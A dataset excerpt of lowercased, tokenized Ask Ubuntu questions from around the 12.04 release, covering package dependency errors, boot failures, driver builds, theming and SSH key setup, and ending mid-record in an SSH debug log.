153378	does firefox phishing protection / safebrowsing have any privacy implications ?	the current google results are outdated . what is the current status ? i was on www.mozilla.org/en-us/legal/privacy/firefox.html and saw `` protection against suspected forgery and attack sites features '' . can you translate please more to human speak ? first they download a list and compare local ... ok ... here it gets messy `` if there is a match , firefox will check with its third party provider to ensure that the website is still on the blacklist . the information sent between firefox and its third party provider ( s ) are hashed urls . in fact , multiple hashed urls are sent with the real hash so that the third party provider ( s ) will not know what site you are visiting . '' - > if that hash were send to mozilla , they would knew which site were accessed ? `` in order to safeguard your privacy , firefox will not transmit the complete url of web pages that you visit to anyone other than mozilla and its service providers . '' - > in other words , mozilla and its service providers get all complete urls ( of sites , which were in blacklist ) ? `` while it is possible that a third party service provider may determine the actual url from the hashed url sent , mozillaâs policy is to require [ ... ] '' - > privacy is depends on policy rather than technology ?
153379	can i upgrade ubuntu 12.04 from 32 bit to 64 bit ?	there was a similar question for older ubuntu versions , but not for 12.04 . multiarch is ready now and in ubuntu 12.04 ? can i upgrade from 32 bit to 64 bit ?
153380	unable to login using new mysql user added via phpmyadmin	on my computer yesterday i installed 12.04 and applied all updates . i have installed lamp on this system using following command sudo apt-get install lamp-server^ phpmyadmin . i created a new user from phpmyadmin and given that user all the global privileges , but i am not able to login using that new user , i have also restarted the mysql service , reload the privileges , but still its not working . it used to work fine in ubuntu 10.04 .
153384	trouble turning on bluetooth in 12.04	i am using 12.04 lts dual boot , and i ca n't use the bluetooth service in ubuntu . it works fine with windows 7 . in ubuntu i can turn on the bluetooth from the titlebar but when i switch on the visibility it automatically switches back ( i 'm using gnome 3 environment ) . all this happened after the 1st update ( worked fine before then ) .
153386	if i enable ufw , and disable ssh . is my base install ubuntu 12.04 safe from the outside world ?	i installed ubuntu 12.04 i then installed gufw , enabled it and set every known application setting to `` deny '' . i never installed sshdaemon so i think its off . my machine still responds to pings ... but otherwise is it safe now ?
153390	âproblem with mergelistâ error when trying to do an update . cleaning lists does n't help	# apt-get install shutter reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.canonicalcom_dists_precise_partner_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i tried to clean /var/lib/apt/lists as described here : how do i fix a `` problem with mergelist '' error when trying to do an update ? it does n't help . after apt-get update the same error happens : w : gpg error : http : //archive.canonicalcom precise inrelease : file /var/lib/apt/lists/partial/archive.canonicalcom_dists_precise_inrelease does n't start with a clearsigned message w : failed to fetch copy : /var/lib/apt/lists/partial/archive.canonicalcom_dists_precise_partner_source_sources encountered a section with no package : header w : failed to fetch http : //archive.canonicalcom/dists/precise/partner/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.canonicalcom_dists_precise_partner_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead .
153395	how do i remove ubuntu ?	i got ubuntu just to try it out . it said at installation that i would be able to choose which os i wanted to run ( windows 7 or ubuntu ) at start up . however , it does n't let me choose os at start up . it would n't be such a big deal ( because ubuntu is pretty neat ) but ubuntu does n't load right . i 'm constantly restarting my computer 6 or so times because it 's continually freezing after the login screen . what can i do to remove ubuntu and go back to windows 7 . i have to remove ubuntu through ubuntu . it will not load windows 7 for me at all . i 'm very new to ubuntu , so any help will be greatly appreciated .
153402	run bash script as root	is there some way i can run a bash script as root without being prompted for a password every time ? i 'm attempting to automate the process of starting my lampp install , which requires me running a couple of sudo commands to start and stop services . optimally , i 'd like to build this into an executable file , so all i 'd have to do is click an icon . ; ) obviously , i have the password , so that 's not an issue . i just want to take my laziness one step farther and not have to enter it every time i start my localhost . after all , that 's what programming is all about , right ?
153403	how do i get the hotkeys working on a lenovo ideapad ?	after installing ubuntu 12.04 lts on my u400 lenovo , i found some hotkeys are not working ( enable/disable touchpad , display on/off , webcam enable/disable ) how to fix the problem ?
153404	is there an `` unofficial '' software center with all the ppas ?	many questions are answered simply with add this repository and install . i understand that ubuntu developers can not quickly verify all packages and make them available in official repositories . but is there an unofficial main repository or software center where developers can register their ppas ? adding individual repositories is a pain and the update also takes longer as it has to check all the ppas . like we have alternative markets for android , it would be great if there are any popular alternative software sources that we can reasonably trust .
153415	why trash folder named as .trash-1000 ?	i 'm just curious to know why > trash folder set to hide ? what 's the matter with `` -1000 '' in the trash name and what its indicating ?
153416	is there a better paravirtualization solution than xen ?	question : i want to run a ( para ) virtual machine on my linux console server . catch-22 is that the processor does not support vtx/amdv , so i have to use para virtualization instead of normal/hardware virtualization . unfortunately , xen can not bridge the wlan network adapter on my developer machine . therefore i ca n't use xen , as i ca n't get it to work properly . if i use nat on the developer machine , i ca n't be sure everything/anything works on the server , and i have experienced enough to know that it 's only a question of time ( most times a very short time ) until this will end in disaster , so i do not want that . the point is i want to be able to transfer the vm image from the developer machine to the server - unchanged . is there any other ( =better ) para virtualization-capable application for linux other than xen ? for example , virtualbox seemed to never to have problems with bridging network adapters to wlan0 , but afaik , virtualbox needs vtx/amdv , is n't it ?
153419	how does this [ t ] ricky bracket expression in grep work ?	i saw this one-liner recently : $ ps -ef | grep [ f ] irefox thorsen 16730 1 1 jun19 ? 00:27:27 /usr/lib/firefox/firefox ... so it seems to return the list of processes with `` firefox '' in the data but leaving out the grep process itself , and therefore seems roughly equivalent to : ps -ef |grep -v grep| grep firefox i ca n't understand how it works though . i 've looked at the man page on grep and elsewhere but have n't found an explanation . and to compound the mystery if i run : $ ps -ef | grep firefox > data $ grep [ f ] irefox data thorsen 15820 28618 0 07:28 pts/1 00:00:00 grep -- color=auto firefox thorsen 16730 1 1 jun19 ? 00:27:45 /usr/lib/firefox/firefox ... . the [ t ] rick seems to stop working ! someone here will know what 's going on i 'm sure . thanks .
153427	is it possible to install a `` for purchase '' package using apt-get ?	do i have to use the software center to install a non-free package ? can i make a purchase using apt-get ? how about if already made the purchase and i want to re-install the software . can that be done with apt-get ?
153433	having xubuntu at its minimal display level , need the actual version of xubuntu with the eye candy features !	i just installed xfce4 on my ubuntu 12.04 desktop.and this is how it looks like , less eye candy , this is how it looks like but i just need the desktop to be like the below , as i have graphics card support , which works good on my ubuntu 3d , how can i make this work on xubuntu ? i need the desktop to be like this
153437	ca n't see installed software	i 've install the `` ask ubuntu lens '' from the software center but it did n't show up is the lenses and i ca n't search for it as an install app ! what should i do ?
153438	unable to make sound play in headset	top right , i click the sound icon , select sound settings , and connect my usb-headset . i can them see the headset being detected as it pops up in the menu . i click it , and expect the currently played audio to get sent to the headset instead . my problem is that it does not . the audio keeps playing through the built-in speakers . more info : the icon for my built-in card in the sound settings is a circuit with a note symbol on top . the symbol for the headset is just black background with a `` no '' symbol on it . might mean it does n't work somehow . i installed pavucontrol , and notice that no second sound card shows up in there . when connecting , the syslog says jun 20 09:38:46 yuna kernel : [ 40144.553431 ] usb 2-1.2 : new full-speed usb device number 11 using ehci_hcd jun 20 09:38:46 yuna kernel : [ 40144.650609 ] input : c-media usb headphone set as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.3/input/input20 jun 20 09:38:46 yuna kernel : [ 40144.650895 ] generic-usb 0003:0d8c:000c.000b : input , hidraw0 : usb hid v1.00 device [ c-media usb headphone set ] on usb-0000:00:1d.0-1.2/input3 jun 20 09:38:46 yuna mtp-probe : checking bus 2 , device 11 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 '' jun 20 09:38:46 yuna mtp-probe : bus : 2 , device : 11 was not an mtp device
153442	wine installation not completing due to held broken packages	i 'm running ubuntu 12.04 64bit and i want to install wine . this is the output of sudo apt-get install wine : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . i spend 4 hours and i have not made any progress . i do n't get it . here is how the dependencies looks like : wine - > wine1.4 wine1.4 - > wine1.4-amd64 wine1.4-amd64 - > wine1.4-common wine1.4-common - > wine1.4 i see a problem here . please help me .
153445	usb ubuntu 12.4 boot problem	salam everyone . i searched the entire forum but no solution worked for me . i downloaded the iso image of ubuntu 12.4. and by using unetbootin i made my usb drive bootable . but on booting it gives error `` syslinux 3.86 2010-04-01 ebios copyright 1994-2010 h. peter anvin et al . no default or ui configuration diretive found . boot : '' i checked the md5sum they are also fine . i tried changing folder and file names to sys and formated my derive fat32 and fat but nothing worked . i tried different boot programs like lilo and linuxpenderive . but mr. peter anvin is not willing to leave my boot screen . so what should i do ? ? thanks in advance
153447	how to pxe install my netbook ? i have a desktop with a cdrom , but want to pxe install my netbook	i want to install ubuntu 1204 on my netbook . ( it does not have working usb ports , but has a ethernet port ) . how do i setup my desktop ubuntu 1204 to host the ubuntu installer to install it on my netbook ? thank you so much for your guidance .
153449	wubi ubuntu 12.04 install upgrade to full	i used wubi to install ubuntu 12.04 on my desktop . it had windows xp on it and the dvd drive died . and i would like to migrate to ubuntu . so i used wubi . but it seems that wubi installs ubuntu on a virtual hard drive . so i tried a reinstall with unetbootin on my 8gb usb drive . but the machine is so old that it can not boot from usb . so that is my current scenario , and i would like to know if i can upgrade my wubi install to a full install . no dual boot . format the whole drive etc . all resources on the net use a cd or dvd drive . which does not work for me . i have an usb wifi dongle which i used to download and install wubi from within win xp . i also have a windows bootloader and afterwards grub bootloader : s p.s . i have found this guide , is this the recommended option for me ?
153451	how can i get the value of window id ?	when recording a specific window by recordmydesktop , what should i do for investigating `` windowid '' specified as a `` windowid '' option ?
153453	apt-get install fails due to dependency issues but apt-get -f install wo n't fix it	i 've just installed ubuntu 12.04 and was about to manually install rawstudio with the packages from sourceforge repo , but i 've been stuck with dependency issues and i am short on apt command lines to sort this out . here 's the report i'v got : installarchives ( ) failed : dpkg : dependency problems prevent configuration of libgphoto2-2 : libgphoto2-2 depends on libjpeg62 ; however : package libjpeg62 is not installed . libgphoto2-l10n ( 2.4.13-1ubuntu1 ) breaks libgphoto2-2 ( < = 2.4.10.1-4 ) and is installed . version of libgphoto2-2 to be configured is 2.4.10.1-0ubuntu3~maverick . dpkg : error processing libgphoto2-2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgphoto2-2-dev : libgphoto2-2-dev depends on libgphoto2-2 ( = 2.4.10.1-0ubuntu3~maverick ) ; however : package libgphoto2-2 is not configured yet . dpkg : error processing libgphoto2-2-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libgphoto2-2 libgphoto2-2-dev error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of libgphoto2-2 : libgphoto2-2 depends on libjpeg62 ; however : package libjpeg62 is not installed . libgphoto2-l10n ( 2.4.13-1ubuntu1 ) breaks libgphoto2-2 ( < = 2.4.10.1-4 ) and is installed . version of libgphoto2-2 to be configured is 2.4.10.1-0ubuntu3~maverick . dpkg : error processing libgphoto2-2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgphoto2-2-dev : libgphoto2-2-dev depends on libgphoto2-2 ( = 2.4.10.1-0ubuntu3~maverick ) ; however : package libgphoto2-2 is not configured yet . dpkg : error processing libgphoto2-2-dev ( -- configure ) : dependency problems - leaving unconfigured i 've tried `` apt-get -f install '' but without success . what is the mahick command line that will unblock the situation ? thanks seb
153465	mysql and php problems	i 'm new in server-side programming . i need lampp and mysql running on my computer . i have installed mysql using tasksel lamp-server , and then install php with apt-get install libapache2-mod-php5 phpmyadmin . and now i have now ideas how to use them . in xampp on windows i needed only to copy my php files in htdocs directory . how to run php files in linux and connect them to my mysql ?
153467	how do i build and install the gspca webcam driver ?	i tried to install gspca to run orite webcam on ubuntu 12.04 64-bit , but i failed . it lost a lot of headers , here are my instructions but failed . wget http : //mxhaard.free.fr/spca50x/download/gspcav1-20071224.tar.gz tar zxvf gspcav1-20071224.tar.gz cd gspcav1-20071224/ sudo ./gspca_build sudo touch /usr/src/linux-headers-3.2.0-25-generic/include/linux/config.h sudo mkdir /usr/src/linux-headers-3.2.0-25-generic/include/asm sudo touch /usr/src/linux-headers-3.2.0-25-generic/include/asm/semaphore.h sudo touch /usr/src/linux-headers-3.2.0-25-generic/include/linux/videodev.h sudo touch /usr/src/linux-headers-3.2.0-25-generic/include/linux/smp_lock.h how to solve it ? i move to /usr/src and make : sam @ sam : /usr/src/gspcav1-20071224 $ sudo make make -c /lib/modules/`uname -r`/build subdirs=/usr/src/gspcav1-20071224 cc=cc modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-25-generic' cc [ m ] /usr/src/gspcav1-20071224/gspca_core.o /usr/src/gspcav1-20071224/gspca_core.c:37:26 : fatal error : linux/config.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /usr/src/gspcav1-20071224/gspca_core.o ] error 1 make [ 1 ] : *** [ _module_/usr/src/gspcav1-20071224 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-25-generic' make : *** [ default ] error 2 sam @ sam : /usr/src/gspcav1-20071224 $
153473	t420 triple head with optimus	i see that this is possible on a t520 apparently ( triple-head on a lenovo t520 ) , but i ca n't see anyone claiming it 's possible on a t420 . i 'm running 12.04 and have bumbleebee installed and working fine but i ca n't get the display port monitor to display anything . the power light flicks on , but things only render on my vga output monitor , and ubuntu 's display settings do n't detect the third monitor . i 'm not concerned with power management , ie , am happy to leave set on discrete graphics in the bios if that helps . is this possible ? thanks .
153481	my computer 's not starting up without the ubuntu usb	i installed ubuntu 12.04 lts in my dell inspiron 1545 from a usb stick but it is not booting up when i removed the usb from the computer . but it is working when i put the usb in my computer . i want ubuntu to start without the usb . please can you help me ? thanks .
153485	running crysis 2 on ubuntu gives me an error message	i recently installed ubuntu alongside windows 7 and i installed crysis 2 with wine . crysis 2 works fine when i run windows , however when i run it using wine in ubuntu cryengine gives me a message saying : unsupported video card detected ! continuing to run migth lead to unexpected results or crashes ... .. i 've got two video cards ones an intel and the other is a nvidia . i typed lspci into the terminal and my nvidia card was listed under video controller as well .
153486	how do i boot ubuntu cloud images in vmware ?	i want to run an ubuntu cloud image on on vmware . i just need to know how to set the ovf properties in a way that vmware understands in order to pass parameters to cloud-init . what i 've done install vmware player 4.0.4 , using the vmware workstation 8.0.2 / player 4.0.2 fix for linux 3.2+ patch to get around the compilation failure for virtual ethernet module . download precise-server-cloudimg-amd64.ovf , and also the precise-server-cloudimg-amd64.img file ( compressed qcow2 format , 220mb ) convert the image from qcow2 to vmdk : qemu-img convert -o vmdk precise-server-cloudimg-amd64-disk1.img disk.vmdk edit the ovf < file > element to change the ovf : href and ovf : size to match the output of qemu-img : < file ovf : href= '' disk.vmdk '' ovf : id= '' file1 '' ovf : size= '' 689569792 '' / > edit the < disk > element to set sparse vmdk format and desired capacity in bytes ( 8gb here ) : < disk ovf : capacity= '' 8589934592 '' ovf : diskid= '' vmdisk1 '' ovf : fileref= '' file1 '' ovf : format= '' http : //www.vmware.com/interfaces/specifications/vmdk.html # sparse '' / > remove all the < property > elements because vmplayer does not recognise them . configure the virtualhardwaresection section to set cpu and ram to taste . either run the ovf in vmplayer , or convert to vmx and run the vmx : ovftools custom.ovf mymachine.vmx vmplayer mymachine.vmx unfortunately i ca n't log in as `` ubuntu '' at the prompt because the ovf properties have n't been provided to cloud-init . how should i do this ?
153490	ubuntu 12.04 login screen flickers . âcould not write bytes : broken pipesâ	i use ubuntu 12.04 x64 with a dual-boot setup . yesterday it worked fine but this morning when i attempted to boot it gets to the login screen and then it just flickers , alternating between the login screen and the console showing boot items ( mainly apache , the last one being `` battery status '' although it 's a desktop ) all with [ ok ] status . the only error that i can see is : `` could not write bytes : broken pipes '' on top of the screen . the only things i can think of that could cause this are : this morning i had a removable hdd plugged in during boot time , which i usually do n't have yesterday i 've installed dwarven fortress that requires some x32 libraries so i 've installed ia32 using synaptic . as far as i know this should n't brake the system but i did n't reboot yesterday so i ca n't be sure . i 've tried booting in recovery mode and tried running the utils there but still no luck . i 've ran out of ideas . thanks . edit : forgot to mention that all partitions have plenty of free space edit2 : in the end i just reinstalled ubuntu as time was of the essence .
153491	how to find pure-ftpd version	i have installed pure-ftpd on my ubuntu 10.04 lts ? which command will give the version of the server running ?
153495	how to launch configure kde control module by command line ?	right-clicking on the top bar of a window gets you , via `` configure window behavior '' , to the window manager settings . here you can learn and configure the advanced features of kwin . but is there a way to launch window manager settings using the command line ?
153498	`` use android as a remote '' option wo n't stay selected in mythbuntu control centre	when i try to connect to my mythbuntu machine using mythmote on android , i get the following error : io except : /192/168.0.4:5456 - connection refused : 192.168.0.4 at first i thought it was the same issue as this question , but , i 've now discovered a problem on the mythbuntu side . when i go into mythbuntu control centre - > infrared romotes and transmitters , it has no additional remote support selected . despite the fact that i selected use android or ios phone as a remote last time i looked at it . if i try to select use android or ios phone as a remote , when i hit apply , it says `` no changes found '' . if i login and out , or reboot , it reverts back to the no additional remote support option . how do i get my use android or ios phone as a remote option to stick ?
153501	how do i create and use keyboard shortcuts in a gtk app that i am developing ?	i am creating an application for the ubuntu app showdown in python + gtk with quickly . i am calling it discvur . i would have liked to include some keyboard shortcuts . searching the web , i found this page about accelgroup and this page about gtk_widget_add_accelerator but i do n't understand how to start with it . could you tell me how i would define an appropriate signal and then use it in my application ?
153504	how do i make apport file a bug report automatically ?	in 12.04 i get alot of sorry , ubuntu 12.04 has experienced an internal error popups i found this tutorial on how to get rid of internal system error ( webupd8 ) . it disables apport . what i want is that apport automatically reports the bug and not `` bug '' me with further popups .
153505	problem in installing gimp-plugin-registry	using ubuntu 11.04.. updated gimp 2.6 to gimp 2.7 . but have problem in installig gimp-plugin-registry rajesh @ rajesh-system-product-name : ~ $ sudo apt-get install gimp-plugin-registry -y [ sudo ] password for rajesh : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . gimp-plugin-registry : depends : gimp ( < = 2.7 ) but 2.7.3-2011052002~nn is to be installed e : broken packages
153508	fonts in google earth look bad even after installing microsoft fonts	google earth fonts look bad , even after installing the microsoft font package . i am using ubuntu 12.04 , 64 bit . is there a way to solve this problem ?
153512	how do i edit a 'read only ' file in 12.04 desktop ?	i want to edit a file in 12.04 desktop . previously ( in lucid ) i could right click , select 'open with ' , and type in 'gksudo gedit ' - which was then added to the list of available 'open with ' programs . this functionality has completely disappeared in 12.04 - or am i missing something ? i know i can fire up a terminal and type it in there - but this is supposed to be user friendly , not going back to the bad old days . i may as well use 'sudo nano ' ! regards john
153517	ubuntu 12.04 network printing through windows samba server	i have to print through a samba server sharing an hp printer . after upgrading to 12.04 i 'm no longer able to get it to work . the printer is shared through a samba server and i need to provide logon info ( domain , username and password ) . the machine that i 'm having trouble with is a fresh install of ubuntu 12.04 64 bit . as a measure to troubleshoot , i created a fresh install of ubuntu 10.04 32 bit as a virtual box image on the ubuntu 12.04 64 bit machine and had no trouble getting it to print . i suspect authentication to be the problem . any idea as to what is wrong ? any suggestions how to make further troubleshooting ? any information i should provide to enable you to help me ? edit : to be more specific , when i want to add a network printer i do this through the gui and when i need to input credentials it will not verify me ( although this works fine on the virtual box ) . print dialog . as username i input domain/username . if i choose `` prompt user if authentication is required '' and then press verify it prompts me for credentials ( username , domain and password ) . if i input username as : domain/username , let domain be empty and supply a password it is able to verify everything . this is the only way that i have made it to verify credentials on ubuntu 12.04 . this however does n't make me able to print .
153522	how does the hud prioritize commands ?	every now and then i want to reach the `` edit > preferences '' menu item in firefox , and the hud makes this very convenient . alt + `` edi '' will suggest exactly that to me . something that i find annoying however is that if i complete the work `` edit '' instead , the hud will switch to suggest `` network > edit preferences '' instead . while this is a perfectly valid match as well , it seems like an inconsistent behaviour to me . could someone explain in more detail how the matching works , so that i can make better use of the hud ?
153525	installing wine 1.4 errors on precise 12.04	this message is consistently received when installing wine1.4 , which fails to install properly update-initramfs : generating /boot/initrd.img-3.2.0-25-generic-pae fatal : no images have been defined . run-parts : /etc/initramfs/post-update.d//runlilo exited with return code 1 dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools any thoughts appreciated .
153530	how to perform full system restore on ubuntu 12.04 removing all software footprints	how to go about performing system restore in ubuntu 12.04 ( precise pangolin ) so that it also remove all software footprints as well . my system has only ubuntu and is 64 bit .
153531	partitioning problem	ok so first i have no prior linux experience but i am a power user and not afraid of complexity do explain me clearly . i created a 50 gb partition ( unallocated ) then installed ubuntu 12.04 beta 2 lts and while installing i choose first option which says install ubuntu over windows 7 but after installing i got confused that did it get installed on unallocated space as it never asked me about creating partition , but after watching disk management in windows and after trying many partition software i came up with these things so please tell me what actually happened and how everything is installed on which drive . is my created partition being used or wasted ? should i merge any partition or leave it as it is ? site does not allows me to post images but i will tell you guys what it says : the extra partition of 51gb that i have created is i think split in 2 drives first one is shown as ext4 ( 44.6 gb ) ( in mini partition tool windows ) and second one is shown as linux swap ( 5.9 gb ) in windows disk management they both are shown as `` healthy ( primary partition ) '' so please explain me how things are installed and is it bad .
153533	custom local menu in gnome 2	[ user @ laptop ~ ] dpkg -l | grep -i gnome-desktop ii gnome-desktop-data 1:2.30.2-0ubuntu1 common files for gnome desktop apps ii libgnome-desktop-2-17 1:2.30.2-0ubuntu1 utility library for loading .desktop files - r [ user @ laptop ~ ] lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid [ user @ laptop ~ ] how can i create new entries here ? : so that we can add for example : not just new `` empty file '' - rather `` new openoffice odt '' , or gimp image , etc..
153534	are palestinians out of the ubuntu app showdown contest ?	canonical does not support shipment to palestine . are we ( palestinians ) out of the ubuntu app showdown contest because of that ? edit i contact canonical shipment team , and they told me they do n't support shipment to palestine , and also i tried to buy some stuff from there website , but i could n't cause of that reason . and here the exact words in recieved from the canonical shipment team : `` at the present time we do not ship to your region but hope to do so in the future .
153536	get source code for a ppa	when i want to get the source code for a package in a ppa , how do i get it ? is there some `` normal '' approach , or do i have to contact the developer in question ? example case : i wanted to look at the changes that were made to compiz in this ppa : https : //launchpad.net/~bsantos/+archive/ppa i 'm interested in a reference to the version control system , not in a source package , because the source package does n't tell me what changes the author made .
153544	which version of lubuntu should i use ?	i want to install a light distro on my netbook . ( it currently has an out of date distro which is not upgradeable . ) here are the specs : eee pc 4g glaxy , linux 4g ssd , 512mb ddr2 intel mobile cpu & chipset wi-fi 802 , 11b/g 10/100mbps ethernet , 0.3 m camera which lubuntu should i use please ? will everything work -- including wireless ?
153545	long power button press delete	is it possible to disable the shutdown on long press of the hardware power button ? i already disabled any actions on single , short press , but the computer still turns off on a long press of the power button . how can i remove that ?
153549	how to detect a computer 's physical screen size in gtk	i 've come across this bug while writing my app . in short , the app 's window size is fixed , which does not work well with smaller screens such as in netbooks . in those , the lower buttons are off the screen limits and can not be used . i 'd like to take this into account in the user interface , but first of all , i 'd like to find out what the standard way to detect screen size is in gtk , if there is one . so does anyone have any ideas on how to do that ?
153553	no choice of audio output device	in ubuntu 11.10 , in system settings - > sound , under the output tab , there was a menu to select the audio output device , so i could connect my laptop to my tv and select if i wanted to use the laptops speakers or use the hdmi , and the tv 's speakers . i am now using ubuntu 12.04 , i just connected the hdmi cable to my laptop and tv , and all i see in settings - > sound is this : any idea how to select to use tv 's speakers ?
153555	how to get rid of white color on white text for ambiance blue theme ?	after upgrading to ubuntu 12.04 , windows pop up with white color on white text . i am lost , confused , feeling very stupid and am not sure what to do next . i would greatly appreciate it if someone could please take a look at my issue . my problem is similar to this person 's experience : hope-dt gtk+ theme displays white fonts after upgrade to 12.04 i see on advanced settings i am using the 'ambiance blue ' gtk+ theme , whatever a gtk+ is . changing this to any of the other gtk+ themes fixes the white on white problem , but makes the background colours of minimised windows really ugly - i.e . like graphics of early 1980s pcs . only 'ambiance blue ' seems to set them right . looking at white text on white background problem , it seems i need to manually edit some configuration files . there 's 3 configuration files and i did n't know which one to use , so i changed them all . now i have : **/usr/share/themes/ambiance blue/gtk-3.0/gtk.css : ** /* default color scheme */ @ define-color bg_color # cdc3b8 ; @ define-color fg_color # 262626 ; @ define-color base_color # accdff ; @ define-color text_color # 262626 ; @ define-color selected_bg_color # 01b9fc ; @ define-color selected_fg_color # ffffff ; @ define-color tooltip_bg_color # a3d0ff ; @ define-color tooltip_fg_color # 023c79 ; **/usr/share/themes/ambiance blue/gtk-3.0/settings.ini : ** [ settings ] gtk-color-scheme = `` base_color : # accdff\nbg_color : # cdc3b8\ntooltip_bg_color : # a3d0ff\nselected_bg_color : # ffffff\ntext_color : # 262626\nfg_color : # 262626\ntooltip_fg_color : # 023c79\nselected_fg_color : # ffffff\nlink_color : # 1448dd\nbg_color_dark : # 373b3c\nfg_color_dark : # d2dbdf '' **/usr/share/themes/ambiance blue/gtk-2.0/gtkrc : ** gtk-color-scheme = `` base_color : # accdff\nfg_color : # 262626\ntooltip_fg_color : # 023c79\nselected_bg_color : # 01b9fc\nselected_fg_color : # ffffff\ntext_color : # 262626\nbg_color : # cdc3b8\ntooltip_bg_color : # a3d0ff\nlink_color : # 1448dd '' i restart the computer and then go into advanced settings and select 'ambiance blue ' and i still get white on white . q1 . which of the 3 configuration files actually matters ? i am not using unity ; i 'm not sure what i 'm using . gnome 2 or gnome 3 or gnome-something or something like that i think . here are some environment variables : gtk_modules=canberra-gtk-module : canberra-gtk-module xdg_session_path=/org/freedesktop/displaymanager/session0 xdg_seat_path=/org/freedesktop/displaymanager/seat0 defaults_path=/usr/share/gconf/gnome-classic.default.path xdg_config_dirs=/etc/xdg/xdg-gnome-classic : /etc/xdg desktop_session=gnome-classic mandatory_path=/usr/share/gconf/gnome-classic.mandatory.path gdmsession=gnome-classic gnome_desktop_session_id=this-is-deprecated xdg_data_dirs=/usr/share/gnome-classic : /usr/share/gnome : /usr/local/share/ : /usr/share/ xdg_current_desktop=gnome q2 . is there some way of testing this without restarting the computer each time ? ( i tried turning all numbers in one of the files to # 000000 but it did n't seem to do anything . q3 . exactly which number do i need to change to get rid of the white-on-white ?
153562	ssh id_rsa.pub asking for passphrase when none given for keypair	i am trying to set up a new user on my ubuntu cloud server and i am having some issues with the ssh keypair . created the keypair : mkdir ~/.ssh chmod 700 ~/.ssh ssh-keygen -t rsa added the key to authorized_keys : cat ~/.ssh/id_rsa.pub > > authorized_keys and copied the key to another server to test a login . this is the debug from my attempted ssh session . liam @ development ~/android/system $ ssh -vv -i ~/si_id_rsa.pub simon @ cloud.com openssh_5.5p1-lpk , openssl 0.9.8n 24 mar 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug2 : ssh_connect : needpriv 0 debug1 : connecting to cloud.com [ 192.168.0.1 ] port 22. debug1 : connection established . debug1 : identity file /home/liam/si_id_rsa.pub type 1 debug1 : identity file /home/liam/si_id_rsa.pub-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1 debug1 : match : openssh_5.9p1 debian-5ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.5 debug2 : fd 3 setting o_nonblock debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , 